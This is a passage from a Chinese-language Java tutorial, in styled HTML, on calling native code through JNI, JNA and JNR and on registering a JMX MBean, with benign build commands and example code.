"Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">libgetpidjni.dylib</p></div><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;">$ gcc -I $JAVA_HOME/include -I $JAVA_HOME/include/darwin -dynamiclib -o libgetpidjni.dylib com_test_GetPidJni.c</p></pre><div style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">运行 <p style="font-size: 14px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;padding: 2px 4px;border-radius: 4px;margin-right: 2px;margin-left: 2px;color: rgb(30, 107, 184);background-color: rgba(27, 31, 35, 0.05);word-break: break-all;">GetPidJni</p> 类</div><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(97, 174, 238);line-height: 26px;">$</span><span style="line-height: 26px;"> java -Djava.library.path=`<span style="color: rgb(230, 192, 123);line-height: 26px;">pwd</span>` -cp <span style="color: rgb(152, 195, 121);line-height: 26px;">"target/classes"</span> com.test.GetPidJni</span></p></pre><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JNA</h3><figure style="margin-top: 10px;margin-bottom: 10px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;font-size: 16px;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><figcaption style="margin-top: 5px;text-align: center;color: rgb(136, 136, 136);font-size: 14px;">311340321101993.png</figcaption></figure><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">可以看到使用jna步骤减少了很多，最重要的是我们不需要重写我们的动态链接库文件，而是有直接调用的API</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">NA只需要我们写Java代码而不用写JNI或本地代码。功能相对于Windows的Platform/Invoke和Python的ctypes</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JNA使用一个小型的JNI库插桩程序来动态调用本地代码</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JNA包括一个已与许多本地函数映射的平台库，以及一组简化本地访问的公用接口</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JNA把一个.dll/.so文件看做是一个Java接口</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">package</span> com.sun.jna.examples;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> com.sun.jna.Library;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> com.sun.jna.Native;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> com.sun.jna.Platform;<span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">class</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">HelloWorld</span> </span>{      <span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">interface</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">CLibrary</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">extends</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">Library</span> </span>{        <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//需要定义一个接口，继承自Library或StdCallLibrary</span>        CLibrary INSTANCE = (CLibrary)            Native.loadLibrary((Platform.isWindows() ? <span style="color: rgb(152, 195, 121);line-height: 26px;">"msvcrt"</span> : <span style="color: rgb(152, 195, 121);line-height: 26px;">"c"</span>),                               CLibrary<span style="line-height: 26px;">.<span style="color: rgb(198, 120, 221);line-height: 26px;">class</span>)</span>;        <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//接口内部需要一个公共静态常量：INSTANCE，通过这个常量，就可以获得这个接口的实例.常量通过Native.loadLibrary()这个API函数获得.第一个参数是动态链接库dll/so的名称,第二个参数是本接口的Class类型。JNA通过这个Class类型，根据指定的.dll/.so文件，动态创建接口的实例</span>                <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">/*搜索动态链 接库路径的顺序是：先从当前类的当前文件夹找，如果没有找到，再在工程当前文件夹下面找win32/win64文件夹，找到后搜索对应的dll文件，如果 找不到再到WINDOWS下面去搜索，再找不到就会抛异常*/</span>        <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">printf</span><span style="line-height: 26px;">(String format, Object... args)</span></span>;    }<span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">//接口中只需要定义你要用到的函数或者公共变量，不需要的可以不定义</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">static</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">main</span><span style="line-height: 26px;">(String[] args)</span> </span>{        CLibrary.INSTANCE.printf(<span style="color: rgb(152, 195, 121);line-height: 26px;">"Hello, World\n"</span>);        <span style="color: rgb(198, 120, 221);line-height: 26px;">for</span> (<span style="color: rgb(198, 120, 221);line-height: 26px;">int</span> i=<span style="color: rgb(209, 154, 102);line-height: 26px;">0</span>;i < args.length;i++) {            CLibrary.INSTANCE.printf(<span style="color: rgb(152, 195, 121);line-height: 26px;">"Argument %d: %s\n"</span>, i, args[i]);        }    }}</p></pre><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">类型映射</h3><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">Java中是没有char *指针类型的，因此const char *转到Java下就是String类型</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);"><strong>JNA是不能完全替代JNI的</strong></p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JNI技术，不仅可以实现Java访问C函数，也可以实现C语言调用Java代码，而JNA只能实现Java访问C函数。</p><h3 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 20px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JNR</h3><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">添加依赖</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="line-height: 26px;"><<span style="color: rgb(224, 108, 117);line-height: 26px;">dependency</span>></span>    <span style="line-height: 26px;"><<span style="color: rgb(224, 108, 117);line-height: 26px;">groupId</span>></span>com.github.jnr<span style="line-height: 26px;"></<span style="color: rgb(224, 108, 117);line-height: 26px;">groupId</span>></span>    <span style="line-height: 26px;"><<span style="color: rgb(224, 108, 117);line-height: 26px;">artifactId</span>></span>jnr-ffi<span style="line-height: 26px;"></<span style="color: rgb(224, 108, 117);line-height: 26px;">artifactId</span>></span>    <span style="line-height: 26px;"><<span style="color: rgb(224, 108, 117);line-height: 26px;">version</span>></span>2.1.10<span style="line-height: 26px;"></<span style="color: rgb(224, 108, 117);line-height: 26px;">version</span>></span><span style="line-height: 26px;"></<span style="color: rgb(224, 108, 117);line-height: 26px;">dependency</span>></span></p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">创建本地库接口</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> com.github.jnr.ffi.LibraryLoader;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> com.github.jnr.ffi.NativeLibrary;<span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">interface</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">MyNativeLibrary</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">extends</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">NativeLibrary</span> </span>{    MyNativeLibrary INSTANCE = LibraryLoader.create(MyNativeLibrary<span style="line-height: 26px;">.<span style="color: rgb(198, 120, 221);line-height: 26px;">class</span>).<span style="color: rgb(230, 192, 123);line-height: 26px;">load</span>("<span style="color: rgb(230, 192, 123);line-height: 26px;">mylibrary</span>")</span>;    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">int</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">add</span><span style="line-height: 26px;">(<span style="color: rgb(198, 120, 221);line-height: 26px;">int</span> a, <span style="color: rgb(198, 120, 221);line-height: 26px;">int</span> b)</span></span>;}</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">加载本地类库</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;">MyNativeLibrary nativeLibrary = MyNativeLibrary.INSTANCE;</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">调用本地函数</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">int</span> result = nativeLibrary.add(<span style="color: rgb(209, 154, 102);line-height: 26px;">10</span>, <span style="color: rgb(209, 154, 102);line-height: 26px;">20</span>);System.out.println(<span style="color: rgb(152, 195, 121);line-height: 26px;">"Result: "</span> + result);</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">处理异常</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;">try {    int result = nativeLibrary.add(10, 20);    System.out.println("Result: " + result);} catch (Throwable t) {    t.printStackTrace();}</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">效率JNI>JNR>JNA</p><h2 style="margin-top: 30px;margin-bottom: 15px;color: rgb(0, 0, 0);font-weight: bold;font-size: 22px;font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">JMX</h2><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">简单来说jmx是一个管理MBean的规范，各种组件实现了各自的JMX实现，可以用来监控管理我们的指定的java程序</p><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">首先定义一个MBean接口和实现他的类</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">package</span> com.wdbyte.jmx;<span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">/** * <span style="color: rgb(198, 120, 221);line-height: 26px;">@author</span> <a href="https://www.wdbyte.com" target="_blank">https://www.wdbyte.com</a> */</span><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">interface</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">MyMemoryMBean</span> </span>{    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">long</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">getTotal</span><span style="line-height: 26px;">()</span></span>;    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">setTotal</span><span style="line-height: 26px;">(<span style="color: rgb(198, 120, 221);line-height: 26px;">long</span> total)</span></span>;    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">long</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">getUsed</span><span style="line-height: 26px;">()</span></span>;    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">setUsed</span><span style="line-height: 26px;">(<span style="color: rgb(198, 120, 221);line-height: 26px;">long</span> used)</span></span>;    <span style="line-height: 26px;">String <span style="color: rgb(97, 174, 238);line-height: 26px;">doMemoryInfo</span><span style="line-height: 26px;">()</span></span>;}</p></pre><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">class</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">MyMemory</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">implements</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">MyMemoryMBean</span> </span>{    <span style="color: rgb(198, 120, 221);line-height: 26px;">private</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">long</span> total;    <span style="color: rgb(198, 120, 221);line-height: 26px;">private</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">long</span> used;    <span style="color: rgb(97, 174, 238);line-height: 26px;">@Override</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">long</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">getTotal</span><span style="line-height: 26px;">()</span> </span>{        <span style="color: rgb(198, 120, 221);line-height: 26px;">return</span> total;    }    <span style="color: rgb(97, 174, 238);line-height: 26px;">@Override</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">setTotal</span><span style="line-height: 26px;">(<span style="color: rgb(198, 120, 221);line-height: 26px;">long</span> total)</span> </span>{        <span style="color: rgb(198, 120, 221);line-height: 26px;">this</span>.total = total;    }    <span style="color: rgb(97, 174, 238);line-height: 26px;">@Override</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">long</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">getUsed</span><span style="line-height: 26px;">()</span> </span>{        <span style="color: rgb(198, 120, 221);line-height: 26px;">return</span> used;    }    <span style="color: rgb(97, 174, 238);line-height: 26px;">@Override</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">setUsed</span><span style="line-height: 26px;">(<span style="color: rgb(198, 120, 221);line-height: 26px;">long</span> used)</span> </span>{        <span style="color: rgb(198, 120, 221);line-height: 26px;">this</span>.used = used;    }    <span style="color: rgb(97, 174, 238);line-height: 26px;">@Override</span>    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> String <span style="color: rgb(97, 174, 238);line-height: 26px;">doMemoryInfo</span><span style="line-height: 26px;">()</span> </span>{        <span style="color: rgb(198, 120, 221);line-height: 26px;">return</span> String.format(<span style="color: rgb(152, 195, 121);line-height: 26px;">"使用内存: %dMB/%dMB"</span>, used, total);    }}</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">然后向MBeanSearver注册</p><pre style="font-size: 16px;font-family: SFMono-Regular, Consolas, "Liberation Mono", Menlo, Courier, monospace;margin-top: 10px;margin-bottom: 10px;overflow: auto;border-radius: 5px;box-shadow: rgba(0, 0, 0, 0.55) 0px 2px 10px;color: rgb(0, 0, 0);letter-spacing: normal;text-align: left;background-color: rgb(255, 255, 255);"><p style="font-size: 12px;font-family: "Operator Mono", Consolas, Monaco, Menlo, monospace;display: -webkit-box;overflow-x: auto;padding: 15px 16px 16px;color: rgb(171, 178, 191);background: rgb(40, 44, 52);border-radius: 5px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> java.lang.management.ManagementFactory;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> javax.management.InstanceAlreadyExistsException;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> javax.management.MBeanRegistrationException;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> javax.management.MBeanServer;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> javax.management.MalformedObjectNameException;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> javax.management.NotCompliantMBeanException;<span style="color: rgb(198, 120, 221);line-height: 26px;">import</span> javax.management.ObjectName;<span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">/** * <span style="color: rgb(198, 120, 221);line-height: 26px;">@author</span> <a href="https://www.wdbyte.com" target="_blank">https://www.wdbyte.com</a> */</span><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">class</span> <span style="color: rgb(230, 192, 123);line-height: 26px;">MyMemoryManagement</span> </span>{    <span style="line-height: 26px;"><span style="color: rgb(198, 120, 221);line-height: 26px;">public</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">static</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">void</span> <span style="color: rgb(97, 174, 238);line-height: 26px;">main</span><span style="line-height: 26px;">(String[] args)</span> <span style="color: rgb(198, 120, 221);line-height: 26px;">throws</span> MalformedObjectNameException, NotCompliantMBeanException,        InstanceAlreadyExistsException, MBeanRegistrationException, InterruptedException </span>{        <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">// 获取 MBean Server</span>        MBeanServer platformMBeanServer = ManagementFactory.getPlatformMBeanServer();        MyMemory myMemory = <span style="color: rgb(198, 120, 221);line-height: 26px;">new</span> MyMemory();        myMemory.setTotal(<span style="color: rgb(209, 154, 102);line-height: 26px;">100L</span>);        myMemory.setUsed(<span style="color: rgb(209, 154, 102);line-height: 26px;">20L</span>);        <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">// 注册</span>        ObjectName objectName = <span style="color: rgb(198, 120, 221);line-height: 26px;">new</span> ObjectName(<span style="color: rgb(152, 195, 121);line-height: 26px;">"com.wdbyte.jmx:type=myMemory"</span>);        platformMBeanServer.registerMBean(myMemory, objectName);        <span style="color: rgb(198, 120, 221);line-height: 26px;">while</span> (<span style="color: rgb(198, 120, 221);line-height: 26px;">true</span>) {            <span style="color: rgb(92, 99, 112);font-style: italic;line-height: 26px;">// 防止进行退出</span>            Thread.sleep(<span style="color: rgb(209, 154, 102);line-height: 26px;">3000</span>);            System.out.println(myMemory.doMemoryInfo());        }    }}</p></pre><p style="margin-bottom: 0px;font-size: 16px;padding-top: 8px;padding-bottom: 8px;line-height: 26px;color: rgb(0, 0, 0);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, "PingFang SC", Cambria, Cochin, Georgia, Times, "Times New Roman", serif;letter-spacing: normal;text-align: left;text-wrap: wrap;background-color: rgb(255, 255, 255);">对于管理系统来讲，这些MBean中公开的方法，最终会被JMX转换为属性（Attribute）、监听（Listener）和调用（Invoke）的概念</p><table><thead><tr style="border-width: 1px 0px 0px;border-right-style: initial;border-bottom-style: initial;border-left-style: initial;border-right-color: initial;border-bottom-color: initial;border-left-color: initial;border-top-style: solid;border-top-color: rgb(204, 204, 